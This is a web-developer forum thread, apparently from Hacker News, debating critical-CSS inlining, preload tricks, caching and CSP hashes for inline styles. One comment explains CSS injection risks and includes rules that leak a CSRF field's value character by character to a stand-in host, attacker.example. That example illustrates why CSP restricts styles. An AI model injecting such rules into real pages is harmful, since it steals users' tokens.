I also see that this brings in CSS variable definitions (sorry, ~custom properties~) and things like that. Since critical CSS's size matters so much, it might be worth giving an option to compile all of that down.
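For example (a made-up rule and variable name, just to illustrate the idea), a build step could resolve the variables to static values in the inlined critical copy only:

  :root { --brand: #0b5fff; }          /* definition pulled into the critical CSS */
  .cta-button { color: var(--brand); } /* usage */

  /* "compiled down" critical copy, no variable definition needed: */
  .cta-button { color: #0b5fff; }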
> Place your original non-critical CSS <link> tags just before the closing </body> tag
I don't recommend doing this: you still want the CSS downloaded urgently, critical CSS is a façade. Moving to the end of body means the good stuff is discovered late, and thus downloaded late (and will block render if the preloader[0] discovers it).
These days I'd recommend:
<link rel="preload" href="styles.css" as="style" onload="this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="styles.css"></noscript>
[0] https://web.dev/articles/preload-scanner
Assume it's either 103 Early Hints or Resource Hints in HTTP/1.1 and 2.0.
When the stylesheet loads and is applied to the CSSOM, it's going to trigger layout and style calculations for the elements it's applied to, maybe even the whole page.
Browsers are pretty eager at fetching stylesheets, even those at the bottom of the page.
> Browsers are pretty eager at fetching stylesheets, even those at the bottom of the page
Browsers begin fetching resources as they discover them. For a big enough document, that means resources placed low in the page will suffer.
The whole philosophy of critical styles being those above the fold is a mistake in my view.
Far better to adopt approaches like those recommended by Andy Bell that dramatically reduce stylesheet size.
And do critical styles "correctly", i.e. load those that are needed to render the initial page, and load the ones that rely on interactions separately.
On the contrary, the more complex the CSS is, or the more resources are loaded, the less this would be worthwhile.
The thing I think they are trying to optimize is latency due to RTT. When you first request the HTML file, the browser needs to read it before knowing the next thing to request. This requires a round trip to the server, which has latency (pesky speed of light). The larger your (critical) CSS, the more expensive this optimization is, so the less likely it is a net benefit.
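As a rough sketch of the trade being described (the file name is a placeholder): the critical rules ride along in the HTML response itself, so no extra round trip is needed before first paint, but every inlined byte makes that response bigger.

  <head>
    <style>
      /* critical, above-the-fold rules shipped inside the HTML response */
      body { margin: 0; font-family: system-ui, sans-serif }
      .hero { min-height: 60vh }
    </style>
    <!-- full stylesheet loaded without blocking first paint -->
    <link rel="preload" href="styles.css" as="style" onload="this.rel='stylesheet'">
    <noscript><link rel="stylesheet" href="styles.css"></noscript>
  </head>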
We were doing this optimization more than a decade ago when I worked at HuffPost.
This might make an arbitrary number go up in test suites, at the cost of massively increasing build complexity and reducing ease of working on the project, all for very minimal (if any) improvement for the hypothetical end user, who will be subject to much greater forces outside the developer's control, like their network speed.
I see so much stuff like this, then regularly see websites that are riddled with what I would consider to be very basic user interface and state management errors. It's absolutely infuriating.
Over-obsession with KPIs/arbitrary numbers is one of the side-effects of managerial culture that badly needs to die.
To me thinking about how CSS loads is task #1, but I probably have some unique needs.
We were losing clients due to our web offering scoring poorly on page speed tests. Page speed being part of how a page is ranked can affect SEO (depending on who you ask), so it is very important to our clients. It's not my job to explain how I think SEO works, it's my job to make our clients happy.
I had to design a whole new system to get page speed scores to 100% on Google Lighthouse, which many of our clients were using to test their site's performance. When creating a site optimized for performance, how the CSS and JS and everything loads needs to be thought about before implementing the pages. It can be pretty difficult to optimize these things after-the-fact. We made pretty much everything on the page load in-line including JS and CSS, and the CSS for what displays "above the fold" loads above the HTML it styles. Everything "below the fold" gets loaded below the fold. No FOUC, nothing blocking the rendering of the page. No extra HTTP requests are made to load any of the content. A lot of the JS "below the fold" does not even get evaluated until it is scrolled into view, because that can also slow down page load speed. I took all the advice Google Lighthouse was giving me, and implemented our pages in a way that satisfies it completely. It wasn't really that difficult but it required me changing my thinking about how to approach building websites.
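I'm not claiming this is how their system works, but the "below the fold JS doesn't get evaluated until it scrolls into view" part can be sketched with an IntersectionObserver (the script type and data attribute here are made up):

  // Sketch only: "text/lazy" and data-lazy-section are illustrative names.
  // Scripts embedded with a non-executable type are parsed but never run;
  // they are evaluated only once their section scrolls near the viewport.
  const observer = new IntersectionObserver((entries, obs) => {
    for (const entry of entries) {
      if (!entry.isIntersecting) continue;
      const src = entry.target.querySelector('script[type="text/lazy"]');
      if (src) {
        const s = document.createElement('script');
        s.textContent = src.textContent; // evaluation happens here
        entry.target.appendChild(s);
      }
      obs.unobserve(entry.target);
    }
  }, { rootMargin: '200px' });

  document.querySelectorAll('[data-lazy-section]').forEach((el) => observer.observe(el));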
We were coming from a system that we didn't control, where they decided to load all of the CSS for the entire website on every page, which was amounting to about 3 to 4 MB of CSS alone, and the Javascript was even worse. There was never an attempt to optimize that system from the start, and now many years later they can't seem to optimize it at all. I won't name that system because we still build on it, but it's a real problem for us when a client compares their SEO and page speed scores to their competitors and then they leave us for our competitors, which score only a bit better for page speed.
If performance is the goal, there is no such thing as premature optimization; it has to be thought about from the start. So far our clients have been very happy about their 100% page speed scores (100% even on mobile), and our competition can't come anywhere close unless they put in the work and start thinking differently about the problem.
I actually tried the tool that is the subject of this post on my sites, and it wouldn't work - likely because there is nothing to optimize. We simply don't do any HTTP requests for CSS, and the CSS we need "above the fold" is already "above the fold". I tried it on one of the old pages and it did give a result, but I don't need it because we don't build pages like we used to anymore.
Built on Astro web framework
HTML: 27.52KB uncompressed (6.10KB compressed)
JS: <10KB (compressed)
Critical CSS: 57KB uncompressed (7KB compressed) — tested using this site for performance analysis.
In comparison, many similar sites range from 100KB (uncompressed) to as much as 1MB.
The thing is, I can build clean HTML with no inline CSS or JavaScript. I also added resource hints (not Early Hints, since my Nginx setup doesn't support that out of the box), which slightly improve load times when combined with HTTP/2 and short-interval caching via Nginx. This setup allows me to hit a 100/100 performance score without relying on Critical CSS or inline JavaScript.
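For reference, the resource hints mentioned are just plain markup along these lines (the origin and file names are placeholders):

  <link rel="preconnect" href="https://static.example.com">
  <link rel="preload" href="/css/site.css" as="style">
  <link rel="stylesheet" href="/css/site.css">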
If every page adds 7KB, isn’t it wasteful—especially when all you need is a lightweight SPA or, better yet, more edge caching to reduce the carbon footprint? We don’t need to keep transmitting unnecessary data around the world with bloated HTML like Elementor for WordPress.
Why serve users unnecessary bloat? Mobile devices have limited battery life. It's not impossible to achieve a lightning-fast experience once you move away from shared hosting territory.
A lot of unnecessary bloat can be avoided by only including it when it looks like a user is visiting for the first time (and likely hasn't got the CSS files cached already) or only using the Critical CSS technique for pages that commonly come at the start of a session.
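A rough sketch of that first-visit heuristic, assuming an Express-style server (the cookie name, criticalCss string, and renderPage helper are all made up for illustration, and as noted below cookies bring their own trade-offs):

  // Sketch only: inline critical CSS for visitors who probably have a cold cache.
  app.get('*', (req, res) => {
    const probablyCached = (req.headers.cookie || '').includes('css_v=42');
    const head = probablyCached
      ? '<link rel="stylesheet" href="/site.css">'
      : `<style>${criticalCss}</style>
         <link rel="preload" href="/site.css" as="style" onload="this.rel='stylesheet'">`;
    res.setHeader('Set-Cookie', 'css_v=42; Max-Age=31536000; Path=/');
    res.send(renderPage({ head }));
  });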
I’ve thought about that before but couldn’t figure out the ideal approach. Using a unique session cookie for non-logged in users isn’t feasible, as it could lead to memory or storage issues if a malicious actor attempts a DDoS attack.
I believe this approach also doesn’t work well for static pages, which are likely already hosted close to users.
One useful trick to keep in mind is CSS content-visibility, though it only applies in certain scenarios. One agency I came across was using an <iframe> for every section, which is a bad idea.
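For reference (the class name is just an example), the content-visibility pattern looks like this; note it only skips rendering work for off-screen content, it doesn't change what CSS gets downloaded:

  .below-fold-section {
    content-visibility: auto;
    contain-intrinsic-size: auto 800px; /* reserve space so the scrollbar doesn't jump */
  }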
So my conclusion is that mobile-first CSS is generally more practical, combined with a PWA, which is what I'm building now for a site with lots of listings.
It might improve time to first paint by 10-20ms, but this is a webpage, not a first-person shooter. Besides, subsequent page loads will be slower.
Edit: on second reading, it seems like you are saying that when another page from the same server with the same styles loads, the CSS would have to be reloaded, and this increases bandwidth in cases where a site visitor loads multiple pages. So yes, it is optimal for conditions where the referrer is external to the site.
I mean, I agree with you that this is insanely easy to screw up. However, on most websites there is obviously CSS which doesn't cause reflows and is not needed for first paint. Actually separating that out correctly seems easy to mess up, but it obviously exists.
Feedback welcome, it's free for now.
Given there seem to be few other Critical CSS tools out there, its utility in driving web performance, and the fact Google's web.dev recommended tool (https://github.com/addyosmani/critical) uses penthouse under the hood, I'm surprised there isn't more effort and/or sponsorship going into helping maintain it.
Or maybe they are saying this would always be worth it?
I assume it'd be a trade-off between a number of factors. How many returning vs new visitors? Is the CSS served with proper cache-control headers, 103 Early Hints, and from a CDN? How big is your critical CSS, and how much of your critical HTML does it push out of the initial congestion window?
It uses a remote browser to start a Puppeteer session and runs JavaScript code to extract the critical CSS needed for above-the-fold content. We chose Puppeteer because it’s fast to instrument the browser and works well even on JavaScript-heavy sites.
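Not their actual implementation, but the general shape of that extraction step with Puppeteer looks something like this (the URL and viewport size are placeholders, and real tools handle many more cases such as media queries and pseudo-classes):

  const puppeteer = require('puppeteer');

  (async () => {
    const browser = await puppeteer.launch();
    const page = await browser.newPage();
    await page.setViewport({ width: 1300, height: 900 }); // "the fold" is just a viewport choice
    await page.goto('https://example.com/', { waitUntil: 'networkidle0' });

    const criticalCss = await page.evaluate(() => {
      const fold = window.innerHeight;
      const keep = [];
      for (const sheet of document.styleSheets) {
        let rules;
        try { rules = sheet.cssRules; } catch { continue; } // cross-origin sheets are unreadable
        for (const rule of rules) {
          if (!(rule instanceof CSSStyleRule)) continue;    // skip @media etc. for brevity
          let matches;
          try { matches = document.querySelectorAll(rule.selectorText); } catch { continue; }
          for (const el of matches) {
            const box = el.getBoundingClientRect();
            if (box.top < fold && box.bottom > 0) { keep.push(rule.cssText); break; }
          }
        }
      }
      return keep.join('\n');
    });

    console.log(criticalCss);
    await browser.close();
  })();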
https://github.com/prettydiff/wisdom/blob/master/performance...
That's not to say I think this optimization is necessarily worth it, just that testing on localhost is not a good test of this.
{"error":true,"name":"Error","message":"css should not be empty","stack":"Error: css should not be empty\n at module.exports (/usr/src/app/node_modules/penthouse/lib/index.js:206:14)\n at file:///usr/src/app/server.js:153:31\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)"}
body::after{display:none;content:"";background-image:url("data:image/svg+xml;utf8,<svg xmlns='http://www.w3.org/2000/svg' width='1' height='29'><rect style='fill: rgb(196,196,196);' width='1' height='0.25px' x='0' y='28'/></svg>");position:absolute;top:23px;left:0px;z-index:9998;opacity:1;width:1425px;height:3693px;background-size:auto 1.414rem;background-position-y:0.6rem}
(It lets me uncheck the "display: none" rule in the developer tools to get a baseline grid overlaid on the site to make sure things line up. They don't anymore because I forgot I had that in there until I saw it now!)
I'm waiting for the day developers realize the fallacy of sticking with pixels as their measurement for Things on the Internet.
With a deeper understanding of CSS, one would recognize that simply parsing out only the components "above the fold" (and why are pixels being used here in such an assumptive manner?) completely misses what is being used in modern CSS today - global variables, content-centric declarations, units based on character widths, and so many other tools that would negate "needing" to do this in the first place.
With tools such as PostCSS, and servers serving zipped styles across a CDN while maintaining a single request for the styles, is there really a benefit to breaking up the styles these days?
Also, I’m going to assume, besides the core styles that run a website, anything that is loaded later can come in with its specific styles as part of the HTML/JS.
For the critical CSS thing, we used to kinda do it by hand, with some automation, more as a toolset to help us decide how much to include inline in the HTML itself (in a `<style>` tag) before inserting the stylesheet. But then, we always found it better to set a Stylesheet Budget and work with it.
CDN caches haven't been shared across domains for years. I.e. using a CDN is no faster than a server serving the file itself (usually slower because of DNS lookups, but sometimes slightly faster if the geolocation is closer, assuming the DNS was already looked up).
> Critical CSS refers to the minimal set of CSS rules required to render the visible portion of a webpage (above the fold).
In reality the tool is aimed to style most of the page without loading additional assets so you don't get a jarring repaint when visiting the site.
Edit regarding replies to this comment: I'm sure many will get a kick out of your workarounds and they're all worth posting in the spirit of HN, however I am talking about CSPs that disallow shenanigans. Carry on though :^)
<style>
html { background: red }
</style>
And a CSP like this: default-src 'self'; style-src 'sha256-Ce2SAZQd/zkqF/eKoRIUmEqKy31enl1LPzhnYs3Zb/I=' (the hash is the SHA-256 of the style element's contents, so no nonce attribute is needed).
Here's how I automate mine: https://github.com/uxtely/js-utils/blob/ad7d9531e108403a4146...
Wait, why on earth is this a thing?
- injecting CSS to restyle the page as part of a social engineering attack, or to otherwise trick the user into doing something stupid
- using CSS to load an image or something, to track users viewing the page or capture their IP address
- leaking the values of attributes on the page (you can do complex things with ^= and ~= selectors to leak attribute values; a sketch follows below). Sometimes page text contents can also be leaked using tricks with fonts and scrollbars (not sure if that still works on modern browsers).
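As an illustration of the selector trick (attacker.example and the field name are hypothetical), each injected rule that matches fires a request revealing one more character of the attribute value:

  input[name="csrf"][value^="a"]  { background: url("https://attacker.example/leak?p=a"); }
  input[name="csrf"][value^="ab"] { background: url("https://attacker.example/leak?p=ab"); }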
On the whole though, the surface area is small compared to JavaScript. I often see people restrict CSS before JS (or do the JS restrictions incorrectly) because restricting CSS is much easier, but that is really silly, as an attacker will always reach for JavaScript first if it's available.
Even when they do, they might be subject to a security audit forbidding it. There are two reasons nonces can suck: first, nonces may be passed around for third-party script usage, which blows a hole in your security policy; second, many nonce-generation schemes are not implemented correctly, so the security team might have less trust in devs.
It really depends on the organization and project. Once you start getting near the security fence you may find it's more trouble than it's worth.
I would try to find less complicated solutions for small details like this. Obvious question might be why your CSS can't be a separate file that is small enough to not cause a performance issue.
{"error":true,"name":"Error","message":"css should not be empty","stack":"Error: css should not be empty\n at module.exports (/usr/src/app/node_modules/penthouse/lib/index.js:206:14)\n at file:///usr/src/app/server.js:153:31\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)"}
On most pages, most of the CSS that gets used below the fold gets used above it too, especially once you consider that it needs to handle large desktop monitors and responsiveness. And the remaining part (e.g. styling a footer) is tiny.
The CSS "bloat" that you might want to delay loading is CSS for the rest of the entire site, including all sorts of legacy stuff that might not even be used anymore.
There are lots of strategies for how to load CSS used only by the page, as opposed to the site, which involve various tradeoffs, but can be worth it.
But loading CSS for part of a page seems almost nonsensical. It's not like lazy-loading large images, where we're sometimes talking about megabytes. The CSS used on any single page is usually pretty small to begin with, and even smaller zipped.
That's a terrible tradeoff.
And if a site has a single CSS file, there's only ever a CSS round-trip on the first page. There aren't any round-trips afterwards.
This technique is usually combined with preloads so the parser can identify assets that should be prefetched while the remaining packets are still being downloaded.
If your "Critical CSS" is small enough (i.e., it fits well within the client's initial congestion window), it is very possible it doesn't increase the total number of round trips at all.
As a web developer, if you are optimizing for above-the-fold CSS, you are already optimizing in lots of other ways, and should be fully cognizant of the potential trades for the optimization solutions that are available to you.
There are lots of ways to optimize CSS. I continue to think this particular one is not a good idea under any circumstance, because it's anti-caching, and eliminating a single round trip once is just not ever going to be worth it.
The data is most definitely cached if the server sets the cache expiry for the HTML file, so "anti-caching" makes no sense and is completely orthogonal to the optimization.
If the page's critical CSS is small enough you can deliver an HTML page where the initial render a) happens sooner, and b) is a complete skeleton of your layout plus initial content. All at the low, low price of ~0 additional client-server round trips.
Fun fact: facebook inlines a `style` tag and all HTML necessary to render their initial loading screen. It isn't what I would call "above the fold" CSS, but it is what is referred to as "Critical CSS".
Aside: the most popular and most-used SPAs are scrollers: twitter, instagram, facebook, github, etc, so now I wonder if you might be just trolling?
(Not embedded within the HEAD/STYLE tag)
On a very high traffic site, sure. Anything smaller and I’d argue you should just shove everything down the pipe in one request if you can.
If the bandwidth bothers you, delete an image. You likely don’t have anywhere near that amount in CSS to make up.
My problem is the codebase I am running towards. I am making headway with scoped CSS; however, Firefox does not have it yet. I keep checking in on Firefox to see when it is going to support scoped CSS, but I have not been able to determine what the hold-up is.
Does anyone have scoped CSS working with a workaround or compromise for Firefox?
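For reference, this is the @scope syntax in question, plus the kind of plain-selector fallback sometimes used while support is uneven (class names are just examples, and the fallback is only roughly equivalent since it ignores @scope's proximity rules):

  /* scoped version */
  @scope (.card) to (.card-footer) {
    p { color: #333; }
  }

  /* fallback with ordinary selectors */
  .card p:not(.card-footer p) { color: #333; }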